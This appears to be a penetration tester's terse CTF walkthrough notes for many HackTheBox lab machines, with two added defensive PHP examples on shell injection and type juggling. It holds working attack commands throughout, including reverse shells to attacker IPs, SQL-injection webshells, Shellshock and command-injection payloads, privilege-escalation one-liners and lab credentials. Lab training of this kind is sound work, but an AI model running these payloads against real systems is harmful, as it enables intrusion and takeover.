telnet root login without password got the flag
ftp anonymous login with random password got the flag
smbclient root login WorkShares without password got the flag
redis-cli login without user/pass got the flag
xfreerdp login without password got the flag
admin.php login with admin/admin got the flag
MongoDB shell login without user/pass got the flag
rsync file which is the flag
web login password variable sql injection got the flag
mysql root login without password got the flag
ftp anonymous login get creds file, web login.php got the flag
Remote File Include + responder
NetNTLMv2 hash and crack
evil-winrm login got the flag
gobuster vhost find subdomain indicate aws s3 service
awscli upload webshell.php got the flag
/admin login with the most common user/pass (admin/qwerty123) got the flag
Server Side Template Injection (handlebars-nodejs payload) got the flag
ftp anonymous login found usernames and default cred
hydra ssh login found psql
ssh Local Port Forwarding postgresql(5432)
psql login with same cred on local got the flag
Jenkins page login with root:password
Jenkins Script Console and input Groovy payload get reverse shell
smb admin$ share login with administrator and empty pass
psexec.py get shell
smb backup share login with archetype as username and empty pass
found cred ARCHETYPE\sql_svc:M3g4c0rp123 from a file[prod.dtsConfig]
mssqlclient.py with cred and re-activate xp_cmdshell in MSSQL cli to get code execution
web login as guest and discover user id in url
enum id get admin account id
upload page replace cookie value with admin and its id
upload php-reverse-shell.php
trigger it in /upload (discovered by gobuster)
Initial_Foothold
ftp anonymous login get zip file
zip2john crack and unzip get username and password hash in index file
hashcat crack got admin:qwerty789
web login /dashboard.php?search= sql injection get postgres shell
Privilege_escalation
get postgres:P@s5w0rd! in dashboard.php and su postgres
sudo vi !sh get root
Initial_Foothold
inspect web login request
discover JNDI(Java Naming and Directory Interface API) which is insecure-by-default
install openjdk-11-jdk maven from apt and rogue-jndi from github
`mvn package`, serve base64-encoded payload, set up listener
burp repeater/forward jndi link to target to trigger callback gain unifi(user) shell
Privilege_escalation
mongo update DB password hash with our own `mkpasswd -m sha-512 Password123`
login webpage with it and discover root:NotACrackablePassword4U2022 and ssh
Initial_Foothold
discover Local File Include in default webpage url
discover tftp folder location in /etc/passwd
upload php-reverse-shell.php and trigger with LFI gain www-data shell
Privilege_escalation
find mike cred from .htpasswd and he is in lxd(Linux Containers Daemon) group
google hacktricks lxd/lxc Group to root
Initial_Foothold
webpage login with admin:password discover target using XML 1.0
XXE injection[XML(eXtensible Markup Language) External Entity Injection] read ssh key of daniel
Privilege_escalation 1
Linpeas.sh found AutoLogon default password of Administrator
Privilege_escalation 2
Linpeas.sh found File Permissions "C:\Log-Management\job.bat": Users [AllAccess] its content demand run by administrator
check schtasks to confirm it's a cron job
echo payload to job.bat and setup listener and wait for shell
Initial_Foothold
gobuster webpage, download login.swg, discover '==' in creds compare section(PHP Type Juggling)
bypass password check by editing password in POST into an array which will cause strcmp with PHP Loose Comparison{==Loose,===Strict} return TRUE
after login, upload php-reverse-shell.php
gobuster dir find /_uploads and setup listener and trigger get www-data shell
Privilege_escalation
reuse admin's password found in config.php to get john shell
sudo find -exec
Initial_Foothold
gobuster dir find /admin-dir/credentials.txt which have ftp cred ftpuser:%n?4Wz}R$tTF7
ftp files inspection found web root hidden files, start mysql server on kali
mysql local cli> GRANT ALL PRIVILEGES ON *.* TO root@10.10.10.187 IDENTIFIED by '0xdf' WITH GRANT OPTION;
mysql local cli> CREATE DATABASE pwn; use pwn;
mysql local cli> CREATE TABLE exfil (data VARCHAR(256));
use target /utility-scripts/adminer.php login to our mysql server and input the following command
LOAD DATA LOCAL INFILE '/var/www/html/index.php' INTO TABLE pwn.exfil FIELDS TERMINATED BY "\n";
SELECT * from pwn.exfil; found a valid ssh cred waldo:&<h5b~yK3F#{PaPB&dA}{H>
Privilege_escalation
sudo script admin_tasks.sh has backup.py which has `from shutil import make_archive`
forge python module shutil.py with function make_archive fill with payload
run sudo script with PYTHONPATH=current dir
Initial_Foothold
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution
Privilege_escalation
web_conf_file found db_cred drupaluser:CQHEy@9M*m23gBVj
enum db found user_hash crack got ssh cred brucetherealadmin:booboo
sudo /usr/bin/snap install
Initial_Foothold
wpscan -e ap --plugins-detection aggressive --url http://backdoor.htb --api-token $WPSCAN_API
WordPress Plugin eBook Download 1.1 - Directory Traversal enum all processes
GNU gdbserver 9.2 - Remote Command Execution (RCE)
Privilege_escalation
inspect_processes
something running screen as root periodically
screen -ls root/
discover a session and attach
screen -x root/37344
Initial_Foothold
gobuster dir
/dev/phpbash.php www-data webshell
Privilege_escalation
www-data can sudo as scriptmanager without password
echo payload to cron script get root shell
Method 1
Elastix 2.2.0 - 'graph.php' Local File Inclusion
LFI /etc/amportal.conf leak creds
ssh root password reuse
Method 2
FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution, needs adjustment due to old protocols
sudo nmap --interactive
Method 3
password reuse login to webmin as root
Method 4
10000/tcp ShellShock {Any time there’s CGI (especially on an old machine)}
test for browser response time: User-Agent: () { :; };sleep 10
test ping with tcpdump: User-Agent: () { :; };ping -c 1 10.10.14.2
payload: User-Agent: () { :; };BASH_PAYLOAD
Method 5
Failed: Log Poisoning(put payload in User-Agent and trigger it with LFI access_log) cannot read the file
Success: LFI trigger /var/mail/[username]
Using swaks --to asterisk@localhost --from kali@kali.htb --header "Subject: test shell" --body 'check out this code: PHP_ONE_LINER_PAYLOAD' --server TARGET_IP
Using telnet 25/tcp manually send mail
Initial_Foothold
gobuster dir discover gitlab bookmark
add link to bookmark (unmask autofilled password) OR decrypt the bookmark js code to get cred
login and enum gitlab discover auto deployer
In /profile repo, inject payload into index.php and commit to a new branch(we can't commit to master branch)
merge that new branch into master branch and trigger payload on /profile/index.php to get www-data shell
Privilege_escalation 1
discover multiple containers and nmap scan discover a postgresql server running on local
setup chisel tunnel, psql -h 127.0.0.1 -p 5432 -U profiles, get clave cred
ssh as clave, analyze RemoteConnection.exe in user home dir got root password and ssh as root
Privilege_escalation 2
www-data (root) NOPASSWD: /usr/bin/git pull
cp profile repo into /dev/shm because www-data can't write the profile/.git/hooks
rename payload file as .git/hooks/post-merge
update the master branch (on webpage, edit index.php and commit to new branch=>merge to master)
sudo /usr/bin/git pull
Method 1
gobuster dir
/plugins download BlockCore.jar
apt install jd-gui, found password 8YsqfCTnvxAUeduzjNSXe22 and wpscan found username notch and ssh
sudo ALL
Method 2
login ftp using notch:8YsqfCTnvxAUeduzjNSXe22 upload perm 600 id_rsa and cp it as authorized_keys, then ssh
CVE-2017-6074 also works but crashes a lot
Initial_Foothold
gobuster dir found username fergus and clues in /todo.txt
bruteforce /admin/login with customized script and cewl webpage wordlist found fergus:RolandDeschain
MSF[Bludit Directory Traversal Image File Upload Vulnerability] get www-data shell
Privilege_escalation
found hugo password hash in /bl-content/databases/users.php
crackstation hugo:Password120
ssh (ALL, !root) /bin/bash
Sudo version 1.8.25p1 (before 1.8.28)
CVE-2019-14287[sudo -u#[uid]] but `sudo -u#0 bash` not work, `sudo -u#-1 bash` works
Initial_Foothold
register username input SQL Truncation[pad the username with spaces followed by a non-space character until the max length (20) of the sql username field is exceeded; the trailing non-space is trimmed and the trailing spaces are removed automatically, so registration ends up overwriting the admin account]
discover the collection which guests submitted is located in admin's collection tab as PDF file
XSS[Cross Site Scripting] Using guest account submit a js read file script block(not by file) to the collection, and download the PDF in admin's collection to verify the output.
/etc/passwd read users and user reader's ssh private key in PDF
Privilege_escalation 1
linpeas.sh found CVE-2021-4034
https://github.com/arthepsy/CVE-2021-4034/blob/main/cve-2021-4034-poc.c
Privilege_escalation 2
pspy found a root cron job called logrotate
logrotten https://github.com/whotwagner/logrotten
Initial_Foothold
wpscan find [WP Support Plus Responsive Ticket System 7.1.3 Privilege Escalation] which lets us log in without knowing the password
Failed: edit theme(php file not writable)
Failed: upload plugin payload(dir not writable)
found cred: orestis:kHGuERB29DNiNE in SMTP settings
login Evolution(email app) found orestis:kIEnnfEKJ#9UmdO
login sup3rs3cr3t.brainfuck.htb found conversation about ssh keys in an encrypted thread
decrypted with Vigenère cipher got a url to download ssh key
ssh2john decrypted orestis:3poulakia!
only_read_root.txt
decrypt files(debug.txt,encrypt.sage) in orestis's home
Privilege_escalation
orestis has group id of 110(lxd)
google hacktricks lxd/lxc Group to root
Failed: ssh root from container to localhost(sshd_config:PermitRootLogin no)
Success:echo "orestis ALL=(ALL) NOPASSWD: ALL" >> /container_base/etc/sudoers
Initial_Foothold
gobuster find /actuator/sessions with JSESSIONIDs
replace cookie with a valid JSESSIONID got login
command injection in 'username' of auto patching page, payload need base64 encode and replace space with ${IFS%??} OR $IFS
Privilege_escalation
download cloudhosting-0.0.1.jar and open with jd-gui find cred postgres:Vg&nvzAQ7XxR
psql login on target find password hashes and crack with john
ssh josh:manchesterunited and sudo ssh
Initial_Foothold
gobuster vhost found admin.cronos.htb
SQL Injection bypass login(' or 1=1-- -)
ping page intercept with burp and command injection get www-data shell
Privilege_escalation
linpeas.sh found cron job running a writable file(/var/www/laravel/artisan)
inject php payload got root shell
Initial_Foothold
submit a ticket in helpdesk.delivery.htb and use its ticket_id@delivery.htb to receive confirmation email when registering on delivery.htb TCP/8065
login and enter 'Internal' channel found maildeliverer:Youve_G0t_Mail!
Privilege_escalation 1
Found MariaDB cred mmuser:Crack_The_MM_Admin_PW in /opt/mattermost/config/config.json
found root password hash in MariaDB/mattermost/Users and crack with hashcat root:PleaseSubscribe!
su root
Privilege_escalation 2
Based on msg history of 'Internal' channel, all passwords are related to 'PleaseSubscribe!' =>
echo 'PleaseSubscribe!' > suspectpass.txt
hashcat --stdout ./suspectpass.txt -r /usr/share/hashcat/rules/best64.rule > passwords.txt
./sucrack -a -w 20 -s 10 -u root ./passwords.txt
Initial_Foothold
gobuster dir find /upload 'XML elements:Author,Subject,Content' indicate XXE
XXE injection[XML(eXtensible Markup Language) External Entity Injection] fetch roosa ssh key
Privilege_escalation
found git repo in roosa home
`git log` show all history commit and found 'key'
`git show COMMIT_ID` got some ssh keys
ssh root with key
Initial_Foothold 1
tcp/80 register then found /archive in source code comment
SSTI(Server Side Template Injection) using PayloadsAllTheThings(Exploit the SSTI by calling Popen without guessing the offset)
Initial_Foothold 2
tcp/80 command injection by creating new post with content of a http://KALI_IP/$(cmd)
setup listener on kali, use $IFS to replace space and overwrite ssh key to get stable shell
Privilege_escalation
linpeas.sh found shaun:Guitar123
login tcp:8089 splunk as shaun got more functions
https://github.com/cnotin/SplunkWhisperer2
python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.14.6 --username shaun --password Guitar123 --payload "bash -c 'bash -i >& /dev/tcp/10.10.14.6/443 0>&1'"
Initial_Foothold
webpage found dynadns:sndanyd and gobuster dir found /nic
command injection by curl /nic/update `curl -G --data-urlencode 'hostname=$(cmd).no-ip.htb' 'http://dynadns:sndanyd@10.10.10.244/nic/update'`
need to escape '.' by turning ip into a long dec
Privilege_escalation
find ssh private key in file
nsupdate with a local key in order to match the ssh key 'from' requirement
ssh as bindmgr, inspect sudo script and find vuln code in 'cp *'
setup SUID 'bash' file
create files: '.version'(to satisfy the script condition)
create files: '--preserve=mode'(to preserve the mode of the SUID 'bash' )
run sudo script, newly copied '/etc/bind/named.bindmgr/bash' is owned by root and has SUID preserved.
bash -p
Initial_Foothold
gobuster dir found /cyberlaw.txt with hints
admin login bypass(github php hash collision md5)(php type juggling)(sqlmap dumped admin password hash is a 0e.. hash) got img upload
file name truncation (AA..A.php.gif) reach length to trim the .gif
Privilege_escalation
found moshe:falafelIsReallyTasty in connection.php and su moshe
`w` found user yossi is logged in
`cat /dev/fb0 > screenshot.raw`(frame buffer) and `cat /sys/class/graphics/fb0/virtual_size`(1176,885)
open with gimp(img viewer) and set resolution to 1176,885 found yossi:MoshePlzStopHackingMe!
yossi has disk gid
`debugfs /dev/sda1` to get root.txt and root's ssh key
Initial_Foothold
webpage got img upload
Failed: cmd.php upload is only displayed, not executed
uploaded url can be customized, which means SSRF(Server Side Request Forgery)
gobuster vhost found admin.forge.htb(need to bypass block using admin.Forge.htb OR hosting redirect)
hosting redirect to admin.Forge.htb found /announcements
hosting redirect to admin.Forge.htb/announcements found ftp cred user:heightofsecurity123!
hosting ftp://user:heightofsecurity123!@127.0.0.1 got error
hosting http://admin.forge.htb/upload?u=ftp://user:heightofsecurity123!@127.0.0.1/ show the user.txt which means the working dir is user home
hosting http://admin.forge.htb/upload?u=ftp://user:heightofsecurity123!@127.0.0.1/.ssh/id_rsa
ssh as user
Privilege_escalation
inspect sudo script, run it and `bg` and `nc` interact with it, input secretadminpassword
input non int to cause Exception which call pdb(python debugger)
import os; os.system('bash')
Initial_Foothold
zone transfer got multiple subdomains, ftp /general got creds.txt admin:WORKWORKHhallelujah@# which works in administrator1.friendzone.red
LFI(Local File Include) in 'pagename' and `nmap --script smb-enum-shares.nse -p445 10.10.10.123` shows writable /etc/Development
`smbclient -N //10.10.10.123/Development -c 'put cmd.php' `
pagename=php://filter/convert.base64-encode/resource=dashboard shows the 'pagename' will be appended with '.php'
use LFI trigger(need to replace & with %26) `https://administrator1.friendzone.red/dashboard.php?image_id=&pagename=../../../etc/Development/cmd&cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>%261|nc 10.10.14.7 443 >/tmp/f`
Privilege_escalation
found friend:Agpyu12!0.213$ in mysql_data.conf
su friend, pspy found /opt/server_admin/reporter.py run by root periodically
inspect the script, `import os` which is /usr/lib/python2.7/os.py world-writable
inject python payload get root
Initial_Foothold
gobuster dir find http://frolic.htb:9999/admin "c'mon i m hackable"
http://frolic.htb:9999/admin/success.html decoded with Ook!
curl http://frolic.htb:9999/asdiSIAJJ0QWE9JAS/ got a long string
analyzed by https://www.dcode.fr/cipher-identifier got a zip file
zip2john crack got 'password' and unzip got index.php which is another very long string
analyzed by https://www.dcode.fr/cipher-identifier identified mostly as ASCII Converter got a long base64 string
base64 decode got a long string made of ]>+.< analyzed again identified as Brainfuck, decoded got 'idkwhatispass'
admin:idkwhatispass works on /playsms
searchsploit playsms got many, this one works [PlaySMS 1.4 Remote Code Execution using Phonebook import Function in import.php]
create payload.csv and intercept with burp and replace user-agent with real payload got www-data shell
Privilege_escalation
found SUID [-rwsr-xr-x 1 root root 7480 Sep 25 2018 /home/ayush/.binary/rop]
cat /proc/sys/kernel/randomize_va_space = '0' confirm ASLR(Address space layout randomization) is off and copy to kali
msf-pattern_offset find offset is 52
`ldd /home/ayush/.binary/rop` found /lib/i386-linux-gnu/libc.so.6 (0xb7e19000)
`readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system` note system 0003ada0
`readelf -s /lib/i386-linux-gnu/libc.so.6 | grep exit` note exit 0002e9d0
`strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh` note /bin/sh 15ba0b
transfer exploit.py to target and `/home/ayush/.binary/rop $(python ./exploit.py)` got root
Initial_Foothold
gobuster dir found /exposed.php and it can make server-side requests
start tcpdump and fill in the webpage with `http://10.10.14.15/test.php; ping -c 1 10.10.14.15;`; got a ping back
upload payload `http://10.10.14.15/cmd.php -o uploads/cmd.php`
curl -G http://10.10.10.24/uploads/cmd.php --data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/10.10.14.15/443 0>&1'" got www-data shell
Privilege_escalation
GNU Screen 4.5.0 - Local Privilege Escalation https://www.exploit-db.com/exploits/41154
Initial_Foothold
gobuster vhost found api-prod.horizontall.htb, gobuster dir found http://api-prod.horizontall.htb/admin
`curl http://api-prod.horizontall.htb/admin/strapiVersion` {"strapiVersion":"3.0.0-beta.17.4"}
Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated) https://www.exploit-db.com/exploits/50239
Privilege_escalation
found something running on target local tcp/8000, set up an ssh port forward
Laravel 8.4.2 debug mode - Remote code execution https://www.exploit-db.com/exploits/49424
Initial_Foothold
UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit) https://www.exploit-db.com/exploits/16922; inspecting it gives the gist
`nc 10.10.10.117 6697` and `AB; whoami`
Or use https://github.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor
Privilege_escalation
got hint and pass from /home/djmardov/Documents/.backup
Super elite steg backup pw UPupDOWNdownLRlrBAbaSSss # steg is short for steganography
`wget 10.10.10.117/irked.jpg; steghide extract -sf irked.jpg -p UPupDOWNdownLRlrBAbaSSss` outputs a file called pass.txt: djmardov:Kab6h+m+bbp2J:HG (the second ':' is part of the pass)
strange SUID file: -rwsr-xr-x 1 root root 7328 May 16 2018 /usr/bin/viewuser
`echo '/bin/bash' > /tmp/listusers; chmod +x /tmp/listusers; /tmp/listusers` got root
Initial_Foothold 1
SQL injection /room.php?cod=-1+union+select+1,2,3,4,"<%fphp+echo+shell_exec($_GET['cmd'])%3b%3f>",6,7+into+outfile+'/var/www/html/pwned.php'
`curl "http://10.10.10.143/pwned.php?cmd=id"`
Initial_Foothold 2
SQL injection using group_concat(), which will put all the values from different rows into one string
enum db found DBadmin:2d2b7a5e4e637b8fba1d17f40318f277d29964d0; cracked (MYSQL5 hash) to imissyou
login /phpmyadmin/index.php and inject payload there
Privilege_escalation
www-data `sudo -l` (pepper : ALL) NOPASSWD: /var/www/Admin-Utilities/simpler.py
inspect sudo script, create payload.sh and run sudo script -p then input $(./payload.sh), because the blacklist doesn't contain '$'
found SUID file -rwsr-x--- 1 root pepper 174520 Feb 17 03:22 /bin/systemctl
https://gtfobins.github.io/gtfobins/systemctl/
Initial_Foothold
weblogin with root:password
enum users found lnorgaard:Welcome2023! ssh login
Privilege_escalation
found RT30000.zip in home; unzip got KeePassDumpFull.dmp and passcodes.kdbx
install keepass https://keepass.info/download.html
https://github.com/matro7sh/keepass-dump-masterkey used to guess the master key
google '●Mdgr●d med fl●de' found 'Danish Red Berry Pudding (Rødgrød Med Fløde)' and 'rødgrød med fløde' works
`apt install putty-tools -y` `puttygen putty_rootkey -O private-openssh -o root_rsa`
ssh -i root_rsa root@10.10.11.227
Initial_Foothold
curl webpage found X-Powered-By: PHP/8.1.0-dev
google found https://github.com/php/php-src/commit/c730aa26bd52829a49f2ad284b181b7e82a68d7d
'This line executes PHP code from within the useragent HTTP header, if the string starts with 'zerodium''
PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution https://www.exploit-db.com/exploits/49933
Privilege_escalation
james$ (root) NOPASSWD: /usr/bin/Knife
https://gtfobins.github.io/gtfobins/knife/
`sudo /usr/bin/knife exec -E 'exec "/bin/sh"'`
Method 1
vsftpd 2.3.4 lead to
Failed: using smbclient directly
root@kali# smbclient //10.10.10.3/tmp -U './=`nohup nc -e /bin/sh 10.10.14.24 443`'
Enter =`NOHUP NC -E \bin/sh 10.10.14.24 443`'s password:
For some reason, the start of the command is getting capitalized, which is going to break execution.
Success: switch user within smbclient cli
smb: \> logon "./=`nohup nc -e /bin/sh 10.10.14.24 443`" got root shell
Method 2
github CVE-2007-2447 - Samba usermap script.
https://github.com/amriunix/CVE-2007-2447 got root shell
Initial_Foothold
tcp/9001 'the site says "default"'; google 'supervisord default password' gets user:123, which works
tcp/80 401 response has '127.0.0.1:3000' and 'WWW-Authenticate: Basic realm="."' which means the type of auth required is HTTP basic, and it's also serving in localhost:3000
nmap found http-robots.txt has /weather, gobuster dir /weather found /weather/forecast
enum /weather/forecast found code injection
curl -s "http://10.10.10.218/weather/forecast?city=')+os.execute('id')+--"
curl -G --data-urlencode "city=') os.execute('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.11 443 >/tmp/f') --" 'http://10.10.10.218/weather/forecast' -s
Privilege_escalation
cat .htpasswd got hash; cracked, got webapi_user:iamthebest
/etc/passwd found username r.michaels
`curl -s http://127.0.0.1:3001/~r.michaels/id_rsa -u webapi_user:iamthebest` got the ssh key
Failed: `sudo` on BSD is `doas`
`netpgp --decrypt --output=devel_backup-2020-09-16.tar.gz /home/r.michaels/backups/devel_backup-2020-09-16.tar.gz.enc`
`tar xvzf devel_backup-2020-09-16.tar.gz` and `cat devel-2020-09-16/www/.htpasswd` got webapi_user hash, but different from the .htpasswd one
crack got 'littlebear', `doas sh` enter pass and got root
Initial_Foothold
SQL injection (' or 1=1-- -) bypass /login.php then found img upload.php
add img magic bytes(‰PNG␍␊␚␊) at the top of cmd.php.png https://en.wikipedia.org/wiki/List_of_file_signatures
gobuster dir found /images/uploads/ upload and trigger with curl
Privilege_escalation
/var/www/Magic/db.php5 found db cred theseus:iamkingtheseus
`mysqldump --user=theseus --password=iamkingtheseus --host=localhost Magic` found admin:Th3s3usW4sK1ng
Th3s3usW4sK1ng works when `su theseus`
-rwsr-x--- 1 root users 22040 Oct 21 2019 /bin/sysinfo
`strings /bin/sysinfo` found it's running 'cat' 'lshw' 'fdisk' 'free'
`echo 'chmod 777 /etc/sudoers' > /dev/shm/cat; chmod +x /dev/shm/cat; export PATH=/dev/shm:$PATH`
`which cat` verify '/dev/shm/cat' and trigger `/bin/sysinfo`
`ls /etc/sudoers` verify it's '777' and `echo 'theseus ALL=NOPASSWD: ALL' >> /etc/sudoers`
`su sudoers` got root
Initial_Foothold
TCP/443 cert found staging-order.mango.htb
NoSQL Injection Login Bypass
burp edit: username[$ne]=0xdf&password[$ne]=0xdf&login=login
found cred(admin:t9KcS3>!0B#2 and mango:h3mXK8RhU~f{]f5H) using scripts from 0xdf for ippsec
ssh as mango then su admin
Privilege_escalation
-rwsr-sr-- 1 root admin 10352 Jul 18 2019 /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs
https://gtfobins.github.io/gtfobins/jjs/
`/usr/lib/jvm/java-11-openjdk-amd64/bin/jjs`
echo 'var FileWriter = Java.type("java.io.FileWriter"); var fw=new FileWriter("/etc/sudoers"); fw.write("admin ALL=NOPASSWD: ALL"); fw.close();' | /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs
Initial_Foothold
gobuster vhost found dev01.artcorp.htb and its mainpage has /metaview/
enum /metaview/ discover it's running exiftool, google exiftool cve
CVE-2021-22204 https://github.com/UNICORDev/exploit-CVE-2021-22204
OR manually generate payload by https://github.com/OneSecCyber/JPEG_RCE
Privilege_escalation
pspy found UID1000(thomas) running convert_images.sh which run /usr/local/bin/mogrify
`mogrify --version` found 'Version: ImageMagick 7.0.10-36' google found its exploit
https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html
create payload as /var/www/dev01.artcorp.htb/convert_images/rce.svg and wait for thomas shell
thomas `sudo -l` env_keep+=XDG_CONFIG_HOME (root) NOPASSWD: /usr/bin/neofetch \"\"
`cat /usr/bin/neofetch | grep XDG_CONFIG_HOME=` XDG_CONFIG_HOME="${XDG_CONFIG_HOME:-${HOME}/.config}"
`echo $HOME` /home/thomas which means we can overwrite the config.conf
https://gtfobins.github.io/gtfobins/neofetch/
`echo '/bin/sh' > /home/thomas/config.conf ; sudo neofetch \"\" `
Initial_Foothold
gobuster dir found /admin which is 'pi-hole'
Forensic 'Mirai Botnet' OR google 'pi-hole default cred' found pi:raspberry which works on ssh
Privilege_escalation
pi `sudo -l` (ALL : ALL) ALL (ALL) NOPASSWD: ALL
`sudo su -`; the root.txt is a hint, not the flag
hint says it was on a USB stick
`lsblk` found 'sdb 8:16 0 10M 0 disk /media/usbstick'
Recover_root.txt 1
`grep -aPo '[a-fA-F0-9]{32}' /dev/sdb`
Recover_root.txt 2
`strings /dev/sdb -n 32`
Recover_root.txt 3
copy the entire /dev/sdb to kali, then use file recovery tools like extundelete or testdisk
`dcfldd if=/dev/sdb of=/home/pi/usb.dd` `scp pi@10.10.10.48:/home/pi/usb.dd .`
Initial_Foothold
gobuster dir found /backup/backup.tar which contain source code of webroot files
insert php oneliner payload into middle of payload.php.png and upload
curl /uploads/payload.php.png?cmd=payload got apache shell
Privilege_escalation
analyze crontab.guly: found check_attack.php runs every 3 mins
analyze check_attack.php: found it loops over the files in /var/www/html/uploads/
if ($value == 'index.html') {
based on this part of the code above, we can infer $value is the full file name
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
based on this part of the code above, we can use file name to inject code
touch '/var/www/html/uploads/a; echo bmMgLWUgL2Jpbi9iYXNoIDEwLjEwLjE0LjcgNDQzCg== | base64 -d | sh; b'
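As an added, defender-side illustration (not code from the box's check_attack.php; the function names and the scratch directory are assumed): the pattern on the page, where a file name read from the upload directory is interpolated into a shell command, placed next to two hardened versions. escapeshellarg() makes the shell treat the whole name as one literal argument; dropping the shell entirely and calling unlink() on a validated single-component file name is the better fix.

```php
<?php
// Added example, not the original check_attack.php. Function names are assumed.

// Unsafe pattern (as on the page): $value, a file name taken from the upload
// directory listing, is pasted straight into a shell command line, so any
// shell metacharacters in the name become part of the command.
function buildCleanupCommandUnsafe(string $path, string $value): string
{
    return "nohup /bin/rm -f $path$value > /dev/null 2>&1 &";
}

// Hardened 1: escapeshellarg() wraps the argument in single quotes and
// escapes embedded quotes, so the shell sees exactly one literal word.
function buildCleanupCommandSafe(string $path, string $value): string
{
    return "nohup /bin/rm -f " . escapeshellarg($path . $value) . " > /dev/null 2>&1 &";
}

// Hardened 2 (preferred): no shell at all. Accept only a single path
// component, resolve it, confirm it is inside $dir, then unlink() it.
function cleanupUpload(string $dir, string $value): bool
{
    if ($value === '' || $value === '.' || $value === '..' || $value !== basename($value)) {
        return false;                          // rejects '/', '../' and empty names
    }
    $base = realpath($dir);
    $real = realpath($dir . DIRECTORY_SEPARATOR . $value);
    if ($base === false || $real === false) {
        return false;                          // directory or file does not exist
    }
    if (strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;                          // symlink or other escape from $dir
    }
    return unlink($real);
}

// Constructed demo input: a file name carrying shell metacharacters.
$path  = '/var/www/html/uploads/';
$value = 'a; echo injected; b';

echo "unsafe: ", buildCleanupCommandUnsafe($path, $value), PHP_EOL;
echo "safe:   ", buildCleanupCommandSafe($path, $value), PHP_EOL;

// The shell-free version, exercised against a scratch directory (assumed location).
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'uploads_demo';
@mkdir($dir);
touch($dir . DIRECTORY_SEPARATOR . 'report.txt');
var_dump(cleanupUpload($dir, 'report.txt'));          // a plain name inside $dir is removed
var_dump(cleanupUpload($dir, '../../etc/passwd'));    // rejected: not a single path component
var_dump(cleanupUpload($dir, $value));                // rejected: no such file, and no shell is involved
```

Running it prints the two command strings side by side: in the unsafe one the `;` separators end the rm command, in the safe one the whole name sits inside single quotes. The cron job on the box only needs to delete files it already has a path to, so the unlink() variant removes the shell from the picture entirely.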
got guly shell `sudo -l` (root) NOPASSWD: /usr/local/sbin/changename.sh
According to 0xdf: Anything after a space in a value in a network script where the format is VARIABLE=value will be executed. The response to that disclosure was that anyone who can write that file is basically root anyway, so it doesn’t matter.
run the script and input `a /bin/bash` in any one of the prompts; got root
Initial_Foothold
mainpage source code got hint /nibbleblog/
google nibbleblog default cred admin:nibbles works
image.php upload got nibbler shell
Privilege_escalation
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
-rwxrwxrwx 1 nibbler nibbler 80 Jun 24 07:27 monitor.sh
echo payload to it, then run it got root
Initial_Foothold 1
`hydra -l admin -P /usr/share/seclists/Passwords/Common-Credentials/best1050.txt 10.10.10.43 https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password" -t 64`
admin:password123 logged in; create a php oneliner ninevehNotes.txt and rename it with payload.php, which shows its path /var/tmp/ninevehNotes.txt.php
gobuster dir found /department need login
PHP type juggling: username=admin&password[]= which works
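Why `password[]=` gets through, and what the fix looks like, as an added example (not the box's /department code; the function names and the stored hash are assumed). Sending `password[]=` makes `$_POST['password']` an array; on PHP 7 `strcmp()` then returns NULL with a warning, and `NULL == 0` is true, so a loose `== 0` check passes. On PHP 8 `strcmp()` throws a TypeError instead, which the helper below catches to reproduce the older behaviour. The hardened check refuses non-string input and compares with `password_verify()`.

```php
<?php
// Added example, not the box's own code. Names and the stored hash are assumed.

// Mirrors strcmp() as it behaved on PHP 7 when handed an array: NULL plus a
// warning. PHP 8 throws TypeError instead, so catch it to show the same path.
function strcmpLoose($a, $b)
{
    try {
        return @strcmp($a, $b);
    } catch (TypeError $e) {
        return null;
    }
}

// Vulnerable pattern: loose comparison of strcmp()'s result with 0.
// NULL == 0 is true, so an array password satisfies the check.
function loginLoose($user, $password, string $expectedUser, string $expectedPass): bool
{
    return $user == $expectedUser && strcmpLoose($password, $expectedPass) == 0;
}

// Hardened: reject anything that is not a string (arrays from password[]=,
// missing fields), then verify against a stored password hash.
function loginStrict($user, $password, string $expectedUser, string $storedHash): bool
{
    if (!is_string($user) || !is_string($password)) {
        return false;
    }
    // hash_equals() keeps the username comparison constant-time as well.
    return hash_equals($expectedUser, $user) && password_verify($password, $storedHash);
}

// Constructed demo: what a form post with password[]= looks like server-side.
$postFromBypass = ['username' => 'admin', 'password' => ['']];          // password[]=
$postLegit      = ['username' => 'admin', 'password' => 'correct horse'];
$storedHash     = password_hash('correct horse', PASSWORD_DEFAULT);     // assumed stored hash

var_dump(loginLoose($postFromBypass['username'], $postFromBypass['password'], 'admin', 'correct horse')); // array password passes the loose check
var_dump(loginStrict($postFromBypass['username'], $postFromBypass['password'], 'admin', $storedHash));   // rejected: not a string
var_dump(loginStrict($postLegit['username'], $postLegit['password'], 'admin', $storedHash));             // accepted with the real password
```

The is_string() guard is the part that closes this specific hole; password_verify() and hash_equals() are there because a plain-text comparison against a stored password is the wrong baseline anyway.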
trigger with burp: http://10.10.10.43/department/manage.php?notes=/var/tmp/ninevehNotes.txt.php POST &cmd=id
Initial_Foothold 2
/info.php shown 'file_uploads ON'
POST payload file to info.php and trigger it
I never tried this, only saw it in 0xdf's post
Privilege_escalation(www-data->root)
pspy found root cronjob `/bin/sh /usr/bin/chkrootkit`
Chkrootkit 0.49 - Local Privilege Escalation https://www.exploit-db.com/exploits/33899
